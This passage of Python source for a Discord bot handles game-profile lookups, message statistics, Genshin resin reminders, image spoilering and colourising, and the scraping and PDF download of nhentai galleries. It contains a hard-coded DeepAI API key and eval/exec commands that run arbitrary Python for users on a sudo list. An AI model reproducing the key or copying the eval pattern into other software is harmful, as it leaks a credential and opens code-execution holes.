        if await has_data("external", key, message.author.id):
            return await get_data("external", key, message.author.id)
        else:
            raise BotError(f"You are not linked; please specify {error} or link yourself first!")
    else:
        try:
            member = await get_member(message.guild, command[3], message.author)
            if await has_data("external", key, member.id):
                return await get_data("external", key, member.id)
        except:
            # Best-effort: argument is not a resolvable member; fall through
            # to the literal value below.
            pass
        return command[3]
@client.command("", [("cf", "codeforces"), ("details", "rank", "rating")], "", "")
@client.command("External User Commands", [("cf", "codeforces"), ("details", "rank", "rating"), "?"], "cf/codeforces <details | rank/rating> [user = me]", "report a codeforces user's public details or just rank+rating")
async def command_cf_details(command, message):
    """Look up a Codeforces user (linked member or literal handle) and post
    either a one-line rank/rating summary or a full details embed."""
    cf = await get_ext_user("cf", "a codeforces user", command, message)
    rv = requests.get("https://codeforces.com/api/user.info?handles=" + cf).json()
    if rv["status"] == "OK":
        cfdata = rv["result"][0]
        if command[2] == "rank" or command[2] == "rating":
            await send(message, f"{cf} is rank {cfdata['rank']} [{cfdata['rating']}] (max {cfdata['maxRank']} [{cfdata['maxRating']}])!")
        else:
            # The avatar URL from the API is protocol-relative; prefix "http:".
            embed = discord.Embed(title = cf, color = client.color, url = "https://codeforces.com/profile/" + cf).set_thumbnail(url = "http:" + cfdata["avatar"])
            # Optional profile fields: only shown when present and non-empty.
            for key, name in [
                ("email", "Email Address"),
                ("firstName", "First Name"),
                ("lastName", "Last Name"),
                ("organization", "Organization"),
                ("contribution", "Contribution"),
                ("friendOfCount", "Friend Of #")
            ]:
                if cfdata.get(key):
                    embed.add_field(name = name, value = str(cfdata[key]))
            # NOTE(review): if "city" is set but "country" is missing this
            # raises KeyError — presumably the API always supplies country
            # alongside city; confirm against the Codeforces API docs.
            if cfdata.get("country") or cfdata.get("city"):
                city = f"{cfdata['city']}, " if cfdata.get("city") else ""
                embed.add_field(name = "Location", value = f"{city}{cfdata['country']}")
            embed.add_field(name = "Current Rank", value = f"{cfdata['rank']} [{cfdata['rating']}]")
            embed.add_field(name = "Maximum Rank", value = f"{cfdata['maxRank']} [{cfdata['maxRating']}]")
            embed.add_field(name = "Registered Since", value = datetime.datetime.fromtimestamp(cfdata["registrationTimeSeconds"]).strftime("%B %d, %Y at %H:%M:%S"))
            embed.add_field(name = "Last Seen Online", value = datetime.datetime.fromtimestamp(cfdata["lastOnlineTimeSeconds"]).strftime("%B %d, %Y at %H:%M:%S"))
            await send(message, embed = embed)
    else:
        await send(message, f"'{cf}' is not a codeforces user!", reaction = "x")
def dmoj_api(URL):
    """GET `URL` from the DMOJ API and return its 'data' payload.

    Raises BotError on a non-200 status, an API-reported error, or a
    response with no 'data' key.
    """
    response = requests.get(URL)
    if response.status_code != 200:
        raise BotError(f"'{URL}' returned status {response.status_code} (not 200)!")
    payload = response.json()
    if "error" in payload:
        raise BotError("Error fetching from DMOJ API; likely item does not exist!")
    if "data" not in payload:
        raise BotError("Data not found; check the URL!")
    return payload["data"]
@client.command("", ["dmoj", ("details", "rank", "rating")], "", "")
@client.command("External User Commands", ["dmoj", ("details", "rank", "rating"), "?"], "dmoj <details | rank/rating> [user = me]", "report a DMOJ user's public details or just rank+rating")
async def command_dmoj_details(command, message):
    """Look up a DMOJ user (linked member or literal handle) and post either a
    one-line rank/rating summary or a full details embed."""
    dm = await get_ext_user("dmoj", "a DMOJ user", command, message)
    dmdata = dmoj_api("https://dmoj.ca/api/v2/user/" + dm)["object"]
    rating = dmdata["rating"]
    # Rating thresholds — these appear to mirror DMOJ's rating tiers;
    # TODO(review): confirm the cutoffs against the site.
    if rating < 1000:
        rank = "Newbie"
    elif rating < 1200:
        rank = "Amateur"
    elif rating < 1500:
        rank = "Expert"
    elif rating < 1800:
        rank = "Candidate Master"
    elif rating < 2200:
        rank = "Master"
    elif rating < 3000:
        rank = "Grandmaster"
    else:
        rank = "Target"
    if dmdata["rank"] == "admin":
        rank += " (Admin)"
    if command[2] == "rank" or command[2] == "rating":
        await send(message, f"{dmdata['username']} is rank {rank} [{rating}]!")
    elif command[2] == "details":
        await send(message, embed = discord.Embed(
            title = dmdata["username"],
            color = 0x3333AA,
            url = "https://dmoj.ca/user/" + dmdata["username"]
        ).add_field(
            name = "Points",
            value = "%.2f" % dmdata["points"]
        ).add_field(
            name = "Solved Problems",
            value = str(dmdata["problem_count"])
        ).add_field(
            name = "Contests",
            value = str(len(dmdata["contests"]))
        ).add_field(
            name = "Organizations",
            # A second API call resolves organization IDs to short names.
            value = ", ".join(org["short_name"] for org in dmoj_api("https://dmoj.ca/api/v2/organizations")["objects"] if org["id"] in dmdata["organizations"])
        ).add_field(
            name = "Rank",
            value = rank
        ).add_field(
            name = "Rating",
            value = str(rating)
        ))
@client.command("", ["osu", ("details", "summary")], "", "")
@client.command("External User Commands", ["osu", ("details", "summary"), "?"], "osu <details | summary> [player = me]", "report an osu player's public details or summary")
async def command_osu_details(command, message):
    """Look up an osu! player (linked member or literal name/ID) and post
    either a short summary embed or a full details embed.

    Note: despite the names, the "summary" branch produces the short embed
    and the "details" branch produces the long one.
    """
    osu = await get_ext_user("osu", "an osu! player", command, message)
    rv = requests.get(f"https://osu.ppy.sh/api/get_user?k={config['api-keys']['osu']}&u={osu}")
    if rv.status_code == 200:
        data = rv.json()
        # The legacy osu! API returns an empty list for unknown players.
        if data == []:
            await send(message, "Could not find an osu! player by that username/ID!", reaction = "x")
        else:
            user = data[0]
            if command[2] == "summary":
                await send(message, embed = discord.Embed(title = f"osu! player details: {user['username']}", description = f"Level {user['level']}\nPP: {user['pp_raw']}\nRank: #{user['pp_rank']} (#{user['pp_country_rank']})\nAccuracy: {user['accuracy']}", color = client.color).set_thumbnail(url = f"http://s.ppy.sh/a/{user['user_id']}"))
            else:
                # Convert total play time (seconds) into H:MM:SS components.
                seconds = int(user["total_seconds_played"])
                minutes, seconds = divmod(seconds, 60)
                hours, minutes = divmod(minutes, 60)
                await send(message, embed = discord.Embed(
                    title = f"osu! player summary: {user['username']} #{user['user_id']}",
                    description = f"User since {user['join_date']}",
                    url = f"https://osu.ppy.sh/users/{user['user_id']}",
                    color = client.color
                ).add_field(
                    name = "Level",
                    value = user["level"]
                ).add_field(
                    name = "Accuracy",
                    value = user["accuracy"]
                ).add_field(
                    name = "Performance Points",
                    value = user["pp_raw"]
                ).add_field(
                    name = "Rank",
                    value = f"#{user['pp_rank']} (#{user['pp_country_rank']} in {pycountry.countries.get(alpha_2 = user['country']).name})"
                ).add_field(
                    name = "Score Counts",
                    value = " ".join(f"{user['count' + x]} {emoji('osu_' + x)}" for x in ["300", "100", "50"]),
                    inline = False
                ).add_field(
                    name = "Rating Counts",
                    value = " ".join(f"{user['count_rank_' + x.lower()]} {emoji('osu_' + x)}" for x in ["SSH", "SS", "SH", "S", "A"]),
                    inline = False
                ).add_field(
                    name = "Best Score",
                    value = user['ranked_score']
                ).add_field(
                    name = "Total Score",
                    value = user['total_score']
                ).add_field(
                    name = "Time Played",
                    value = f"{hours}:{str(minutes).zfill(2)}:{str(seconds).zfill(2)}"
                ).set_thumbnail(
                    url = f"http://s.ppy.sh/a/{user['user_id']}"
                ))
    else:
        await send(message, f"Failed to fetch from osu! API: status code {rv.status_code}!", reaction = "x")
def display_ow_rank(rating):
    """Append the tier emoji matching a numeric Overwatch SR; if the rating
    is not numeric (or emoji lookup fails), return it unchanged."""
    tiers = [
        (1500, "ow_bronze"),
        (2000, "ow_silver"),
        (2500, "ow_gold"),
        (3000, "ow_platinum"),
        (3500, "ow_diamond"),
        (4000, "ow_master"),
    ]
    try:
        rank = int(rating)
        for cutoff, name in tiers:
            if rank < cutoff:
                e = name
                break
        else:
            e = "ow_grandmaster"
        return f"{rating} {emoji(e)}"
    except:
        return rating
@client.command("", [("ow", "overwatch"), "summary"], "", "")
@client.command("External User Commands", [("ow", "overwatch"), "summary", "?"], "ow/overwatch summary <player = me>", "report an overwatch player's summary")
async def command_ow_summary(command, message):
    """Post a summary embed for an Overwatch player via the ow-api.com
    unofficial API (battletags formatted as `name-number`)."""
    ow = await get_ext_user("ow", "a Blizzard battletag", command, message)
    try:
        r = requests.get(f"https://ow-api.com/v1/stats/pc/us/{ow}/profile")
        if r.status_code != 200:
            raise RuntimeError("Status Code not 200")
        data = r.json()
        try:
            await send(message, embed = discord.Embed(
                title = f"Overwatch player summary: {data['name']}",
                description = "",
                color = client.color
            ).add_field(
                name = "Level",
                # Each prestige is worth 100 levels in the displayed total.
                value = str(data["level"] + 100 * data["prestige"])
            ).add_field(
                name = "Rating",
                value = display_ow_rank(data["rating"])
            ).add_field(
                name = "Games Won",
                value = str(data["gamesWon"])
            ).add_field(
                name = "Competitive Winrate",
                # "games" is absent for players with no competitive history.
                value = "%.2f%%" % (data["competitiveStats"]["games"]["won"] / data["competitiveStats"]["games"]["played"] * 100) if "games" in data["competitiveStats"] else "N/A"
            ).set_thumbnail(
                url = data["icon"]
            ))
        except:
            # Embed construction failed (unexpected payload shape); log and report.
            print(traceback.format_exc())
            await send(message, "Failed to generate embed!", reaction = "x")
    except:
        await send(message, f"Failed to fetch user data for `{ow}` from Overwatch API; check the spelling of this battletag (please format as `name-number`)!", reaction = "x")
@client.command("", [("lol", "league"), ("report", "current", "report-player", "current-player")], "", "")
@client.command("League of Legends Commands", [("lol", "league"), ("report", "current", "report-player", "current-player"), "?"], "lol/league <report | current>[-player] [player = me]", "create a game report for the player")
async def command_lol_report(command, message):
    """Post a League of Legends game embed for a summoner.

    "report"/"report-player" use the most recent finished match;
    "current"/"current-player" use the live spectator endpoint. The
    "-player" variants restrict the embed to the one summoner.
    """
    sm = await get_ext_user("lol", "a League of Legends summoner", command, message)
    try:
        summoner = watcher.summoner.by_name(lol_region, sm)
        if command[2] == "report" or command[2] == "report-player":
            try:
                # Most recent match only (end_index = 1).
                game = watcher.match.matchlist_by_account(lol_region, summoner["accountId"], end_index = 1)["matches"][0]
                try:
                    if command[2] == "report":
                        await send(message, embed = await lol_game_embed(message.guild, game["gameId"], sm, False), reaction = "check")
                    elif command[2] == "report-player":
                        await send(message, embed = await lol_player_embed(message.guild, game["gameId"], sm, False), reaction = "check")
                except:
                    print(traceback.format_exc())
                    await send(message, "Failed to create embed!", reaction = "x")
            except Exception as e:
                await send(message, f"Could not find a game for {lol_region.upper()}/{sm}! The summoner may not have played a proper game recently enough.", reaction = "x")
        else:
            try:
                # Live game via the spectator API; raises when not in game.
                game = watcher.spectator.by_summoner(lol_region, summoner["id"])
                try:
                    if command[2] == "current":
                        await send(message, embed = await lol_current_embed(message.guild, game, sm))
                    elif command[2] == "current-player":
                        await send(message, embed = await lol_current_player_embed(message.guild, game, [sm]))
                except:
                    print(traceback.format_exc())
                    await send(message, "Failed to create embed!", reaction = "x")
            except Exception as e:
                await send(message, f"Could not find current game for {lol_region.upper()}/{sm}! The summoner may not be in game.", reaction = "x")
    except:
        await send(message, f"Could not find summoner {lol_region.upper()}/{sm}! Please check your spelling.", reaction = "x")
@client.command("League of Legends Commands", [("lol", "league"), "rotation"], "lol/league rotation", "check the current free champion rotation")
async def command_lol_rotation(command, message):
    # Resolve the free-rotation champion IDs to names, alphabetized.
    free_ids = watcher.champion.rotations(lol_region)["freeChampionIds"]
    champions = sorted(champs[cid] for cid in free_ids)
    await send(message, f"This week's free rotation is: {english_list(champions)}.")
@client.command("League of Legends Commands", [("lol", "league"), "ranges", "..."], "lol/league ranges <champion> [champion...]", "compare ability ranges for champions")
async def command_lol_ranges(command, message):
    """Collect the range of every ability (and basic attack) of the given
    champions and print them grouped by range value, ascending.

    Fixes two shadowing issues: the local accumulator was named `champs`
    (hiding the module-level champion table used by other commands) and the
    per-rank inner loop reused `i` from the enclosing spell loop.
    """
    selected = set()
    for champ in command[3:]:
        champ = champ.lower()
        if champ not in cmap:
            await send(message, f"{champ} is not a recognized champion name or ID!", reaction = "x")
            break
        selected.add(cmap[champ])
    else:
        # (range, champion identifier, ability label) triples.
        items = []
        for champ in selected:
            data = requests.get(f"http://ddragon.leagueoflegends.com/cdn/{lol_version}/data/en_US/champion/{champ}.json").json()
            items.append((data["data"][champ]["stats"]["attackrange"], data["data"][champ]["name"], "Basic Attack"))
            for i, spell in enumerate(data["data"][champ]["spells"]):
                ident = data["data"][champ]["name"] + " " + ("QWER"[i] if 0 <= i < 4 else "?")
                if len(set(spell["range"])) == 1:
                    # Same range at every rank: a single entry suffices.
                    items.append((spell["range"][0], ident, spell["name"]))
                else:
                    # Range varies by rank: group the ranks sharing each value.
                    clusters = {}
                    for rank_index, r in enumerate(spell["range"]):
                        if r not in clusters:
                            clusters[r] = []
                        clusters[r].append(rank_index + 1)
                    for key in clusters:
                        items.append((key, ident, spell["name"] + " Rank " + "/".join(map(str, clusters[key]))))
        items.sort()
        # Merge consecutive entries with equal range onto one output line.
        stacked = []
        for item in items:
            if stacked == [] or item[0] != stacked[-1][0]:
                stacked.append([item[0], []])
            stacked[-1][1].append((item[1], item[2]))
        info = "**Range Analysis**\n"
        for rng, stack in stacked:
            stack = ", ".join(f"{ident} ({name})" for ident, name in stack)
            info += f"\n__{rng}__: {stack}"
        await send(message, info, reaction = "check")
@client.command("League of Legends Commands", [("lol", "league"), "item", "?", "..."], "lol item <name>", "get details about an item")
async def command_lol_item(command, message):
    """Post an embed describing a League of Legends item: cleaned description,
    build path, and human-readable tags."""
    # Item names may contain spaces; search with whitespace collapsed out.
    item = find_item("".join(command[3:]).lower())
    await send(message, embed = discord.Embed(
        title = f"League of Legends Item: {item['name']} (#{item['id']})",
        # Strip the API's HTML markup: <br>/<li> become newlines, remaining
        # tags are removed, runs of spaces collapse, and stray spaces just
        # inside parentheses are deleted.
        description = re.sub("(\\() (.)|(.) (\\))", "\\1\\2\\3\\4", re.sub(" +", " ", re.sub("<[^>]+?>", "", re.sub("<br>|<li>", "\n", item["description"])))),
        color = client.color,
        url = f"https://leagueoflegends.fandom.com/wiki/{item['name'].replace(' ', '_')}"
    ).add_field(
        name = "Build Path",
        value = build_path(item["id"]) + ("\n\nBuilds into: " + english_list(lolitems[key]["name"] for key in item.get("into")) if item.get("into") else "")
    ).add_field(
        name = "Tags",
        # Translate the API's internal tag identifiers into display names.
        value = "\n".join("- " + {
            "CriticalStrike": "Critical Strike",
            "NonbootsMovement": "Movement Speed",
            "SpellDamage": "Ability Power",
            "MagicPenetration": "Magic Penetration",
            "ArmorPenetration": "Armor Penetration",
            "SpellBlock": "Magic Resistance",
            "Slow": "Movement Reduction",
            "Jungle": "Jungling",
            "Health": "Health",
            "Lane": "Laning",
            "Aura": "Aura",
            "HealthRegen": "Health Regeneration",
            "SpellVamp": "Spell Vamp",
            "GoldPer": "Gold Income",
            "Mana": "Mana",
            "Vision": "Vision",
            "LifeSteal": "Physical Vamp",
            "Consumable": "Consumable",
            "Armor": "Armor",
            "Stealth": "Stealth",
            "ManaRegen": "Mana Regeneration",
            "OnHit": "On-Hit",
            "Active": "Active",
            "CooldownReduction": "Cooldown Reduction",
            "Trinket": "Trinket",
            "AttackSpeed": "Attack Speed",
            "Boots": "Boots",
            "AbilityHaste": "Ability Haste",
            "Tenacity": "Tenacity",
            "Damage": "Attack Damage"
        }[tag] for tag in item["tags"])
    ).set_thumbnail(
        url = f"http://ddragon.leagueoflegends.com/cdn/{lol_version}/img/item/{item['id']}.png"
    ))
# Maximum display width (characters) for usernames/channel names in the
# stats tables below.
stats_length = 24
async def stats(channel, vis = None):
    """Count messages per author in `channel` (restricted to author IDs in
    `vis` when given) and return (name#discriminator, count) pairs sorted by
    count descending, then name."""
    tally = {}
    async for message in channel.history(limit = None):
        if not vis or message.author.id in vis:
            label = f"{truncate(message.author.name, stats_length - 5)}#{message.author.discriminator}"
            tally[label] = tally.get(label, 0) + 1
    return sorted(tally.items(), key = lambda entry: (-entry[1], entry[0]))
def truncate(string, length):
    """Cap `string` at `length` characters, spending the final slot on an
    ellipsis when it is too long."""
    if len(string) <= length:
        return string
    return string[:length - 1] + "…"
@client.command("Server Statistics Commands", [("channel", "server"), "stats"], "<channel | server> stats", "output the number of messages sent in each channel by each user")
async def command_channel_stats(command, message):
    """Render a message-count table for the current channel or the whole server.

    Only members who can see the current channel are counted; in server mode,
    only channels visible to all of those members are included.

    Fix: the per-channel percentages in server mode were missing the `* 100`
    factor that both per-user renderings already applied, so they displayed
    raw fractions instead of percentages.
    """
    v = set(m.id for m in message.channel.members)
    async with message.channel.typing():
        if command[1] == "channel":
            s = await stats(message.channel, v)
            total = sum(b for _, b in s)
            mc = len(str(max(b for _, b in s)))  # column width of the largest count
            l = max(len(a) for a, _ in s)        # column width of the longest username
            await send(message, embed = discord.Embed(
                title = f"Channel Stats for #{message.channel.name}",
                description = "```\n" + "\n".join(f"{uinfo.ljust(l)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for uinfo, count in s) + "\n```",
                color = client.color
            ))
        else:
            vis = set(message.channel.members)
            counts = {}   # per-user totals across all counted channels
            ccount = {}   # per-channel totals
            cname = {}    # channel id -> channel name
            total = 0
            failed = 0
            for channel in message.guild.channels:
                try:
                    if isinstance(channel, discord.TextChannel):
                        # Only include channels every visible member can also see.
                        if set(channel.members) >= vis:
                            cname[channel.id] = channel.name
                            for uinfo, count in await stats(channel, v):
                                counts[uinfo] = counts.get(uinfo, 0) + count
                                ccount[channel.id] = ccount.get(channel.id, 0) + count
                                total += count
                except:
                    # Usually a missing-permissions error; reported at the end.
                    failed += 1
            mc = len(str(max(max(counts.values()), max(ccount.values()))))
            ul = max(map(len, counts))
            cl = max(map(len, cname.values()))
            l = min(max(ul, cl), stats_length)
            counts = sorted(counts.items(), key = lambda a: (-a[1], a[0]))
            ccount = sorted(ccount.items(), key = lambda a: (-a[1], a[0]))
            await send(message, embed = discord.Embed(
                title = f"Server Stats for {message.guild.name}",
                description = "```\n" + "\n".join(f"{uinfo.ljust(l)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for uinfo, count in counts) +
                    "\n\n" + "\n".join(f"#{truncate(cname[cid].ljust(l - 1), stats_length - 1)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for cid, count in ccount) + "\n```",
                color = client.color
            ))
            if failed:
                await send(message, f"Failed to index the results from {failed} channel{'s' * (failed != 1)}; likely this bot does not have permission to access them.")
@client.command("Miscellaneous Commands", ["blame"], "blame", "blame a random person in this channel (cannot blame any bots)")
async def command_blame(command, message):
    # Pick uniformly among the channel's human (non-bot) members.
    humans = [member for member in message.channel.members if not member.bot]
    await send(message, f"It was {random.choice(humans).mention}'s fault!", allowed_mentions = discord.AllowedMentions.none())
@client.command("Miscellaneous Commands", ["spoiler", "image"], "spoiler image", "accept an image in a DM to spoiler (for mobile users)")
async def command_spoiler_image(command, message):
    """Arm spoiler-forwarding: the author's next DM attachments are re-posted
    to this channel as spoilers, then the arming command is deleted."""
    try:
        # NOTE(review): the original source had an unterminated f-string here
        # (truncated after {message.guild.name}); reconstructed message below.
        await dm(message.author, f"The next image(s) you DM to me will be sent to {message.guild.name}#{message.channel.name} as spoilers!")
        await message.delete()
        await set_data("dm_spoiler", message.author.id, message.channel.id)
    except:
        await send(message, "You need to allow me to DM you to use this feature!", reaction = "x")
@client.command("Miscellaneous Commands", ["color", "image"], "color image", "auto-color the next image you send in this channel with DeepAI")
async def command_color_image(command, message):
    """Arm auto-coloring: the author's next attachment in this channel is run
    through the DeepAI colorizer.

    Renamed from `command_spoiler_image`, which collided with the spoiler
    handler defined just above; registration is via the decorator, so
    behavior is unchanged.
    """
    await send(message, f"The next image you send in this channel will be automatically colored with the power of Artificial Intelligence.")
    await set_data("img_color", message.author.id, message.channel.id, 0)
async def nhentai(nhid, force = False):
    """Fetch and cache gallery metadata for gallery id `nhid`.

    Returns (title, subtitle, sauce, urls). Served from the "nhentai" data
    store unless `force` is set or the gallery has not been cached yet.
    Raises BotError on a 404 or any other non-200 response.
    """
    if force or not await has_data("nhentai", nhid):
        response = requests.get(f"https://nhentai.net/g/{nhid}")
        if response.status_code == 404:
            raise BotError("404 Not Found!")
        elif response.status_code == 200:
            t = response.text
            # Rewrite thumbnail URLs ("t.nhentai.net/...<n>t.ext") into
            # full-image URLs ("i.nhentai.net/...<n>.ext").
            urls = {x.replace("t.", "i.", 1).replace("t.", ".") for x in re.findall("https://t\\.nhentai\\.net/galleries/\\d+/\\d+t\\.\\w+", t)}
            # Sort pages numerically by the integers embedded in each URL.
            urls = sorted(urls, key = lambda s: [int(x) for x in re.findall("\\d+", s)])
            title = re.findall("<span class=\"pretty\">\\s*(.+?)\\s*</span>", t)[0]
            subtitle = re.findall("<span class=\"after\">\\s*(.+?)\\s*</span>", t)[0]
            # The media ID ("sauce") is the first number in the first image URL.
            sauce = int(re.findall("\\d+", urls[0])[0])
            await set_data("nhentai", nhid, (title, subtitle, sauce, urls))
            return (title, subtitle, sauce, urls)
        else:
            raise BotError(f"Unknown error: {response.status_code}")
    else:
        return await get_data("nhentai", nhid)
@client.command("Genshin Commands", ["genshin", "info", "..."], "genshin info <item>", "get info on an item (must enter the internal ID; ask a developer if unsure but it's not too counterintuitive)")
async def command_genshin_info(command, message):
    # Item IDs may contain spaces; rejoin the tokens and normalize case.
    item_id = " ".join(command[3:]).lower()
    await client.genshin_info(item_id, message.channel)
    await message.add_reaction("✅")
async def resin_set(user, amt):
    # Store the virtual timestamp at which the user would have had 0 resin;
    # resin regenerates at 1 per 8 minutes, so current resin can be derived
    # from elapsed time alone.
    anchor = time.time() - 8 * 60 * amt
    await set_data("genshin", "resin_info", user.id, anchor)
async def resin_rmd(user):
    # Return the resin amount the user wants to be reminded at; -1 means
    # "no reminder set".
    return await get_data("genshin", "resin_reminder", user.id, default = -1)
async def resin_amount(uid):
    # Current resin derived from the stored zero-resin timestamp, capped at
    # the 160 maximum; -1 when the user has never set their resin.
    if not await has_data("genshin", "resin_info", uid):
        return -1
    elapsed = time.time() - await get_data("genshin", "resin_info", uid)
    return min(160, elapsed / 8 / 60)
def hm(s):
    # Format a duration in seconds as "XhMM" when at least an hour, else "Mm".
    hours, minutes = divmod(int(s // 60), 60)
    if hours:
        return str(hours) + "h" + str(minutes).zfill(2)
    return str(minutes) + "m"
@client.command("Genshin Commands", ["genshin", "resin", "set", "?"], "genshin resin set <amount>", "tell me how much resin you currently have")
async def command_genshin_resin_set(command, message):
    # Record the user's current resin, then mention any pending reminder's
    # recalculated ETA.
    amt = int(command[4])
    await resin_set(message.author, amt)
    cur = await resin_rmd(message.author)
    if cur == -1:
        note = ""
    else:
        note = f" Your existing reminder, set for {cur} resin, will occur in {hm(8 * 60 * (cur - amt))}."
    msg = await send(message, "Set your resin!" + note)
    if message.guild:
        # Clean up the exchange in guild channels to avoid clutter.
        await message.delete(delay = 5)
        await msg.delete(delay = 5)
@client.command("Genshin Commands", ["genshin", "resin", "now"], "genshin resin now", "check how much resin you currently have")
async def command_genshin_resin_now(command, message):
    # Report derived current resin plus the ETA of any pending reminder.
    amt = await resin_amount(message.author.id)
    cur = await resin_rmd(message.author)
    if amt == -1:
        await send(message, "You haven't told me how much resin you have yet!", reaction = "x")
        return
    note = "" if cur == -1 else f" Your reminder, set for {cur} resin, will occur in {hm(8 * 60 * (cur - amt))}."
    await send(message, f"You currently have {int(amt)} resin!" + note)
@client.command("Genshin Commands", ["genshin", "resin", "reminder"], "genshin resin reminder [[amount] <desired = 160>] / stop", "set / stop a reminder for when you reach a specific amount of resin; your current amount is optional if you've already set your resin amount")
@client.command("", ["genshin", "resin", "reminder", "?"], "", "")
@client.command("", ["genshin", "resin", "reminder", "?", "?"], "", "")
async def command_genshin_resin_reminder(command, message):
    """Set, replace, or cancel a resin reminder.

    Forms: `... reminder stop` cancels; `... reminder [desired]` uses the
    stored resin amount; `... reminder <current> <desired>` also records the
    current amount first. The reminder itself fires elsewhere based on the
    "genshin"/"resin_reminder" data written here.
    """
    if len(command) == 5 and command[4] == "stop":
        msg = await send(message, "I will no longer remind you about your resin!")
        await del_data("genshin", "resin_reminder", message.author.id)
    else:
        if len(command) <= 5:
            # Single optional argument: the desired amount; current resin
            # must already be known.
            if not await has_data("genshin", "resin_info", message.author.id):
                raise BotError("You need to tell me how much resin you have with `genshin resin set` or specify the amount you currently have!")
            des = int(command[4]) if len(command) == 5 else 160
            amt = await resin_amount(message.author.id)
        else:
            # Two arguments: current amount then desired amount.
            amt = int(command[4])
            await resin_set(message.author, amt)
            des = int(command[5])
        if des > 160:
            raise BotError("You cannot have more than 160 resin without using Fragile Resin to exceed that cap manually!")
        if des <= amt:
            raise BotError("You already have that much resin!")
        cur = await resin_rmd(message.author)
        if cur == -1:
            msg = await send(message, f"I will remind you when you reach {des} resin (in {hm(8 * 60 * (des - amt))})!")
        else:
            # Replacing an existing reminder: acknowledge both thresholds.
            msg = await send(message, f"You previously had a reminder for when you reached {cur} resin; I will instead remind you when you reach {des} (in {hm(8 * 60 * (des - amt))})!")
        await set_data("genshin", "resin_reminder", message.author.id, des)
    if message.guild:
        # Clean up the exchange in guild channels to avoid clutter.
        await message.delete(delay = 5)
        await msg.delete(delay = 5)
@client.command("", [("nhentai", "fnhentai"), "?"], "", "")
async def command_nhentai(command, message):
    """Post a paginated gallery embed; "fnhentai" forces a cache refresh.

    The arrow reactions added here are handled elsewhere via the
    "nhentai_embed" record (gallery id, current page index).
    """
    nhid = int(command[2])
    title, subtitle, sauce, urls = await nhentai(nhid, command[1] == "fnhentai")
    reply = await send(message, embed = discord.Embed(title = title + " " + subtitle, url = f"https://nhentai.net/g/{nhid}", description = f"Page 1 / {len(urls)}").set_image(url = urls[0]))
    await reply.add_reaction("⬅️")
    await reply.add_reaction("➡️")
    await set_data("nhentai_embed", reply.id, (nhid, 0))
import httpx
import img2pdf, os
from PIL import Image
from PyPDF3 import PdfFileMerger
from io import BytesIO
async def get_async(url):
    """GET `url` asynchronously with httpx and return the response.

    The local variable is renamed from `client`, which shadowed the
    module-level Discord client within this function.
    """
    async with httpx.AsyncClient() as http_client:
        return await http_client.get(url)
@client.command("", ["nhdownload", "?"], "", "")
async def command_nhdownload(command, message):
    """Download every page of a gallery, convert the images into a single
    PDF under /tmp/<id>/, and upload it (or link it if too large)."""
    async with message.channel.typing():
        nhid = int(command[2])
        # Force a refresh so the page list is current.
        title, subtitle, sauce, urls = await nhentai(nhid, True)
        try:
            os.mkdir(f"/tmp/{nhid}")
        except:
            # Directory already exists from a previous download; reuse it.
            pass
        merger = PdfFileMerger()
        # Fetch all pages concurrently.
        responses = await asyncio.gather(*map(get_async, urls))
        for page, r in enumerate(responses):
            pdf_path = f"/tmp/{nhid}/{page}.pdf"
            # Each image becomes a single-page PDF, then all are merged.
            pdf_bytes = img2pdf.convert(r.content)
            with open(pdf_path, "wb") as f:
                f.write(pdf_bytes)
            merger.append(pdf_path)
        final_path = f"/tmp/{nhid}/final.pdf"
        merger.write(final_path)
        merger.close()
        try:
            with open(final_path, "rb") as f:
                await send(message, file = discord.File(fp = f, filename = f"[{nhid}] {title}.pdf"))
        except:
            # Discord upload failed (presumably the size limit); fall back to
            # an external link.
            await send(message, f"The file is too large to upload; you can access it here: https://dev.hyper-neutrino.xyz/nh/{nhid}")
@client.command("", lambda m: True, "", "")
async def command_image_spoiler_reply(command, message):
    # Matches every message (lambda m: True); only acts on DMs carrying
    # attachments from users who previously armed `spoiler image`.
    if type(message.channel) == discord.DMChannel:
        if len(message.attachments) > 0:
            if await has_data("dm_spoiler", message.author.id):
                # Re-upload each attachment to the armed channel as a spoiler.
                await client.get_channel(await get_data("dm_spoiler", message.author.id)).send(files = [(await attachment.to_file(spoiler = True)) for attachment in message.attachments])
                # One-shot: disarm after forwarding.
                await del_data("dm_spoiler", message.author.id)
@client.command("", lambda m: True, "", "")
async def command_image_color_reply(command, message):
    """Auto-color an attached image via DeepAI when the author has armed
    `color image` in this channel; one-shot, disarmed after use.

    Renamed from `command_image_spoiler_reply`, which collided with the DM
    spoiler handler defined just above.
    """
    if len(message.attachments) > 0:
        if await has_data("img_color", message.author.id, message.channel.id):
            # SECURITY(review): hard-coded third-party API key checked into
            # source; consider moving it into config["api-keys"] like the
            # other service keys.
            r = requests.post("https://api.deepai.org/api/colorizer", data = {"image": message.attachments[0].url}, headers = {"api-key": "551549c3-8d2c-426b-ae9f-9211b13e6f14"})
            await send(message, r.json()["output_url"])
            await del_data("img_color", message.author.id, message.channel.id)
@client.command("", ["echo", "..."], "echo <message>", "echo the message")
async def command_echo(command, message):
    # Echo everything after the literal "echo" token in the raw content.
    start = message.content.find("echo") + 4
    await send(message, message.content[start:])
@client.command("", ["say", "..."], "say <message>", "echo, then immediately delete the command")
async def command_say(command, message):
    # Echo everything after the literal "say" token, then remove the trigger.
    start = message.content.find("say") + 3
    await send(message, message.content[start:])
    await message.delete()
@client.command("", ["eval", "?", "..."], "eval <expr>", "evaluate a Python expression in a command function's scope")
async def command_eval(command, message):
    """Evaluate an arbitrary Python expression and post the result.

    SECURITY: deliberately restricted to user IDs in config["sudo"]; eval of
    arbitrary input is full remote code execution by design here.
    """
    if message.author.id not in config["sudo"]:
        await send(message, "You must be a sudo user to do that!", reaction = "x")
    else:
        try:
            code = message.content[message.content.find("eval") + 4:].strip()
            # Unwrap ```python / ```py code fences and stray backticks.
            if code.startswith("```python"):
                code = code[9:]
            elif code.startswith("```py"):
                code = code[5:]
            code = code.strip("`")
            # Truncate to Discord's 2000-character message limit.
            await send(message, str(eval(code))[:2000])
        except:
            await send(message, "Error evaluating expression!", reaction = "x")
@client.command("", ["exec", "?", "..."], "exec <code>", "execute Python code in a command function's scope (print is replaced with message output)")
async def command_exec(command, message):
    """Execute arbitrary Python statements and post captured print() output.

    SECURITY: deliberately restricted to user IDs in config["sudo"]; exec of
    arbitrary input is full remote code execution by design here.
    """
    if message.author.id not in config["sudo"]:
